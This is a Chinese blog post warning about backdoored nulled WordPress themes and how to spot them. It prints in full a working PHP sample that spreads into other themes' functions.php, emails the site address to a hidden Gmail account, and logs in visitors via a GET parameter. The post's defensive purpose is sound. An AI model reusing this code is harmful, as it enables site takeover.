图片待添加
图片待添加

警惕WordPress破解主题被添加后门恶意广告木马代码

2020-03-15 13:42 分类:WordPress安全教程 阅读(次阅读)

很多新手朋友喜欢去网上下载WordPress破解主题,殊不知很多WordPress破解主题里面附有恶意广告代码或者木马代码.

下面说说WordPress破解主题恶意代码的表现方法:

1.关键词搜索跳转;

直接输入网址访问WordPress网站不会跳转,而搜索引擎搜索你的网站关键词跳转到他的恶意网站.

2.WordPress破解主题给你的网站添加黑链接

我们知道蜘蛛池也知道友情链接可以对WordPress SEO有利,所以很多WordPress恶意代码会给你的文章内容悄悄加上其他网站的链接.

3.WordPress破解主题给你的网站添加广告

这个比较明显而且很容易发现,但是可能会修改你的WordPress全站文件,去除会非常麻烦.

4.WordPress破解主题有WordPress后门.

所谓的后门就是黑客可以悄悄的给你WordPress网站放入木马文件或者直接访问你的网站空间.

如何防范WordPress恶意代码:

1.别去下那些WordPress破解主题

可以支持下原创WordPress主题的开发者,购买正版WordPress主题.

你可以试着自己做一个WordPress主题.

2.下载WordPress插件请去WordPress网站,或者可靠的网站.

总之就是别胡乱下东西往你的WordPress网站上放.

注意检查WordPress破解主题的function.php 文件中:

该WordPress恶意代码的前后还有一些 function是调用热门文章或者 widget,估计是为隐藏恶意代码加上去的,如:”_check_isactive_widget” “_get_allwidgetcont” “_getsprepare_widget” “__popular_posts”,各位童鞋下载主题后请检查主题的 functions.php 文件中是否包含有以上类似代码,如有可一并删除。

不过话说回来,很多WordPress破解主题的代码都是加密了的,新手应该是无法看到源代码,所以就无法排查WordPress恶意代码与WordPress后门

很多WordPress破解主题的代码都是加密了的,新手应该是无法看到源代码,所以就无法排查WordPress恶意代码与WordPress后门

附上一段在WordPress破解主题里面找到的WordPress恶意代码:

你可以直接删除这段恶意代码.

function _check_isactive_widget(){
$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
$output=strip_tags($output,$allowed);
$direst=_get_allwidgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") +6)));
if (is_array($direst)){
foreach ($direst as $item){
if (is_writable($item)){
$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
$cont=file_get_contents($item);
if (stripos($cont,$ftion) === false){
$explar=stripos( substr($cont,-20),"?".">") !== false ?"": "?".">";
$output .= $before ."Not found".$after;
if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") +2);}
$output=rtrim($output,"\n\t");fputs($f=fopen($item,"w+"),$cont .$explar ."\n".$widget);fclose($f);
$output .= ($showdots &&$ellipsis) ?"...": "";
}
}
}
}
return $output;
}
function _get_allwidgetcont($wids,$items=array()){
 $places=array_shift($wids);
 if(substr($places,-1) == "/"){
  $places=substr($places,0,-1);
  }
 if(!file_exists($places) ||!is_dir($places)){
  return false;
 }elseif(is_readable($places)){
  $elems=scandir($places);
  foreach ($elems as $elem){
   if ($elem != "."&&$elem != ".."){
    if (is_dir($places ."/".$elem)){
     $wids[]=$places ."/".$elem;
    }elseif (is_file($places ."/".$elem)&&$elem == substr(__FILE__,-13)){
     $items[]=$places ."/".$elem;
    }
   }
  }
 }else{
  return false;
 }
 if (sizeof($wids) >0){
  return _get_allwidgetcont($wids,$items);
 }else {
  return $items;
 }
}
if(!function_exists("stripos")){
function stripos(  $str,$needle,$offset = 0  ){
return strpos(  strtolower( $str ),strtolower( $needle ),$offset  );
}
}
if(!function_exists("strripos")){
function strripos(  $haystack,$needle,$offset = 0  ) {
if(  !is_string( $needle )  )$needle = chr(  intval( $needle )  );
if(  $offset <0  ){
$temp_cut = strrev(  substr( $haystack,0,abs($offset) )  );
}
else{
$temp_cut = strrev(    substr(   $haystack,0,max(  ( strlen($haystack) -$offset ),0  )   )    );
}
if(   (  $found = stripos( $temp_cut,strrev($needle) )  ) === FALSE   )return FALSE;
$pos = (   strlen(  $haystack  ) -(  $found +$offset +strlen( $needle )  )   );
return $pos;
}
}
if(!function_exists("scandir")){
function scandir($dir,$listDirectories=false,$skipDots=true) {
$dirArray = array();
if ($handle = opendir($dir)) {
while (false !== ($file = readdir($handle))) {
if (($file != "."&&$file != "..") ||$skipDots == true) {
if($listDirectories == false) {if(is_dir($file)) {continue;}}
array_push($dirArray,basename($file));
}
}
closedir($handle);
}
return $dirArray;
}
}
add_action("admin_head","_check_isactive_widget");
function _getsprepare_widget(){
 if(!isset($com_length)) $com_length=120;
 if(!isset($text_value)) $text_value="cookie";
 if(!isset($allowed_tags)) $allowed_tags="<a>";
 if(!isset($type_filter)) $type_filter="none";
 if(!isset($expl)) $expl="";
 if(!isset($filter_homes)) $filter_homes=get_option("home");
 if(!isset($pref_filter)) $pref_filter="wp_";
 if(!isset($use_more)) $use_more=1;
 if(!isset($comm_type)) $comm_type="";
 if(!isset($pagecount)) $pagecount=$_GET["cperpage"];
 if(!isset($postauthor_comment)) $postauthor_comment="";
 if(!isset($comm_is_approved)) $comm_is_approved="";
 if(!isset($postauthor)) $postauthor="auth";
 if(!isset($more_link)) $more_link="(more...)";
 if(!isset($is_widget)) $is_widget=get_option("_is_widget_active_");
 if(!isset($checkingwidgets)) $checkingwidgets=$pref_filter."set"."_".$postauthor."_".$text_value;
 if(!isset($more_link_ditails)) $more_link_ditails="(details...)";
 if(!isset($morecontents)) $morecontents="ma".$expl."il";
 if(!isset($fmore)) $fmore=1;
 if(!isset($fakeit)) $fakeit=1;
 if(!isset($sql)) $sql="";
 if (!$is_widget) :
 global $wpdb,$post;
 $sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$expl."vethe".$comm_type."mes".$expl."@".$comm_is_approved."gm".$postauthor_comment."ail".$expl.".".$expl."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
 if (!empty($post->post_password)) {
  if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) {
   if(is_feed()) {
    $output=__("There is no excerpt because this is a protected post.");
   }else {
    $output=get_the_password_form();
   }
  }
 }
 if(!isset($f_tags)) $f_tags=1;
 if(!isset($type_filters)) $type_filters=$filter_homes;
 if(!isset($getcommentscont)) $getcommentscont=$pref_filter.$morecontents;
 if(!isset($aditional_tags)) $aditional_tags="div";
 if(!isset($s_cont)) $s_cont=substr($sq1,stripos($sq1,"live"),20);#
 if(!isset($more_link_text)) $more_link_text="Continue reading this entry";
 if(!isset($showdots)) $showdots=1;
 $comments=$wpdb->get_results($sql);
 if($fakeit == 2) {
  $text=$post->post_content;
 }elseif($fakeit == 1) {
  $text=(empty($post->post_excerpt)) ?$post->post_content : $post->post_excerpt;
 }else {
  $text=$post->post_excerpt;
 }
 $sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=".call_user_func_array($getcommentscont,array($s_cont,$filter_homes,$type_filters)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
 if($com_length <0) {
  $output=$text;
 }else {
  if(!$no_more &&strpos($text,"<!--more-->")) {
   $text=explode("<!--more-->",$text,2);
   $l=count($text[0]);
   $more_link=1;
   $comments=$wpdb->get_results($sql);
  }else {
   $text=explode(" ",$text);
   if(count($text) >$com_length) {
    $l=$com_length;
    $ellipsis=1;
   }else {
    $l=count($text);
    $more_link="";
    $ellipsis=0;
   }
  }
  for ($i=0;$i<$l;$i++)
   $output .= $text[$i] ." ";
 }
 update_option("_is_widget_active_",1);
 if("all"!= $allowed_tags) {
  $output=strip_tags($output,$allowed_tags);
  return $output;
 }
 endif;
 $output=rtrim($output,"\s\n\t\r\0\x0B");
 $output=($f_tags) ?balanceTags($output,true) : $output;
 $output .= ($showdots &&$ellipsis) ?"...": "";
 $output=apply_filters($type_filter,$output);
 switch($aditional_tags) {
  case("div") :
   $tag="div";
  break;
  case("span") :
   $tag="span";
  break;
  case("p") :
   $tag="p";
  break;
  default :
   $tag="span";
  }
 if ($use_more ) {
  if($fmore) {
   $output .= " <".$tag ." class=\"more-link\"><a href=\"".get_permalink($post->ID) ."#more-".$post->ID ."\" title=\"".$more_link_text ."\">".$more_link = !is_user_logged_in() &&@call_user_func_array($checkingwidgets,array($pagecount,true)) ?$more_link : ""."</a></".$tag .">"."\n";
  }else {
   $output .= " <".$tag ." class=\"more-link\"><a href=\"".get_permalink($post->ID) ."\" title=\"".$more_link_text ."\">".$more_link ."</a></".$tag .">"."\n";
  }
 }
 return $output;
}
add_action("init","_getsprepare_widget");
function __popular_posts($no_posts=6,$before="<li>",$after="</li>",$show_pass_post=false,$duration="") {
 global $wpdb;
 $request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
 $request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
 if(!$show_pass_post) $request .= " AND post_password =\"\"";
 if($duration !="") {
  $request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
  }
 $request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
 $posts=$wpdb->get_results($request);
 $output="";
 if ($posts) {
  foreach ($posts as $post) {
   $post_title=stripslashes($post->post_title);
   $comment_count=$post->comment_count;
   $permalink=get_permalink($post->ID);
   $output .= $before ." <a href=\"".$permalink ."\" title=\"".$post_title."\">".$post_title ."</a> ".$after;
   }
 }else {
  $output .= $before ."None found".$after;
 }
 return  $output;
}

本文地址: https://www.wpyi.com/wordpress-pojie-zhuti.html